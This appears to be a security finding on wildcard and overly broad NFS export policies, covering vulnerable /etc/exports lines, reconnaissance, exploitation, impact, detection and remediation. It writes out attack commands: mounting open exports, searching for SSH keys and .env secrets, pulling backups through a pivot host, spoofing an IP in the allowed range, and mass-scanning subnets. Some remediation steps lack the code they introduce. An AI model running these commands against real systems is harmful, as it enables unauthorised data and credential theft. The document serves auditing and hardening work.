F-7.1: Wildcard and Overly Permissive Export Policies¶
Classification¶
- Severity: High
- CVSS Vector: Network / Low Complexity / No Auth Required
- Affected Versions: All NFS versions
- Configuration: Wildcard
*or broad subnet in/etc/exports - Prerequisite: Network connectivity to target (same subnet or routable)
Summary¶
NFS exports configured with wildcard host specifiers (*) or overly broad subnets allow any machine on the network to mount and access the shared filesystem. Combined with AUTH_SYS (the default), this means anyone on the network segment can access all non-root-owned files on the export with zero authentication.
Technical detail¶
Vulnerable configurations¶
# /etc/exports - worst to less bad:
# Anyone in the world can mount (if routable)
/srv/data *(rw,sync,no_subtree_check)
# Entire /16 subnet (65,534 potential hosts)
/srv/data 192.168.0.0/16(rw,sync)
# Entire domain (depends on DNS — spoofable)
/srv/data *.company.com(rw,sync)
# Stale/decommissioned hosts still in ACL
/srv/data old-server.internal(rw) decomm-host(rw)
How access control works¶
- Client sends MOUNT RPC to mountd
- Server resolves client IP via reverse DNS (if hostname-based ACL)
- Server checks if client matches any entry in the export's allowed hosts
- If matched, returns the root file handle for the export
- Subsequent NFS operations only check the source IP against the export list
Why wildcards are dangerous¶
*matches any host — including attacker machines connected to the same network- No authentication beyond "can you reach port 2049 from an allowed IP?"
- Combined with AUTH_SYS: full read/write access to all non-root files
showmount -epublicly advertises that the export is wide open
Reconnaissance¶
$ showmount -e target
Export list for target:
/home/engineering *
/srv/backups 192.168.0.0/16
/var/shared *.internal.corp
An attacker sees immediately:
- /home/engineering is accessible from anywhere
- /srv/backups accessible from any host in the /16
- /var/shared accessible if you can spoof DNS
Exploitation¶
Direct mount (wildcard export)¶
# Nothing stops us — export allows "*"
mount -t nfs -o vers=3,nolock target:/home/engineering /mnt/loot
# Browse all engineering home directories
find /mnt/loot -name "*.pem" -o -name "id_rsa" -o -name "*.env" 2>/dev/null
Subnet exploitation¶
If the attacker is on a different subnet but has access to a machine in the allowed range:
# Pivot through a compromised host in the allowed subnet
ssh pivot-host "mount -t nfs target:/srv/backups /mnt && tar czf - /mnt" > backups.tar.gz
# Or assign yourself an IP in the allowed range (if on same L2)
ip addr add 192.168.1.200/24 dev eth0
mount -t nfs target:/srv/backups /mnt
Hostname spoofing¶
For exports restricted by hostname with DNS-based resolution:
# If you control DNS or can poison it:
# Set reverse DNS for your IP to match the allowed hostname
# Or use an existing machine whose hostname matches
# The server does: gethostbyaddr(client_ip) -> must match export ACL
# Vulnerable to DNS rebinding / poisoning attacks
Mass scanning for open exports¶
# Scan network for NFS servers with open exports
nmap -p 111,2049 --script nfs-showmount 192.168.0.0/16
# Or with showmount
for ip in $(nmap -p 2049 --open -oG - 192.168.0.0/24 | grep open | awk '{print $2}'); do
echo "=== $ip ==="
showmount -e $ip 2>/dev/null
done
Shodan/Internet exposure¶
NFS shares exposed to the internet are indexed by search engines:
Impact¶
- Zero-effort data access: No credentials, no exploitation, just mount and browse
- Backup exposure: VM backups, database dumps, full system images
- Credential theft: SSH keys, certificates, config files with passwords
- Intellectual property: Source code, R&D data, financial documents
- Compliance violation: PII, PHI, PCI data exposed to unauthorized hosts
- Pivot point: Use stolen credentials/keys to move laterally
Detection¶
- Monitor
showmount -a/rmtabfor unexpected client connections - Alert on new source IPs mounting exports
- Periodic audit of
/etc/exportsfor wildcards - Network monitoring for mount RPC from unexpected sources
Remediation¶
-
Never use
*— always specify exact IPs or minimal subnets: -
Use netgroups for dynamic host lists (hides membership from showmount):
-
Firewall NFS ports: iptables/nftables rules restricting 111, 2049, and dynamic RPC ports
-
Regular audits: Script to check for wildcards in exports:
-
Decommission stale entries: Remove hosts that no longer exist
-
NFSv4-only mode: Disable NFSv3 to reduce enumeration surface (no mountd/showmount)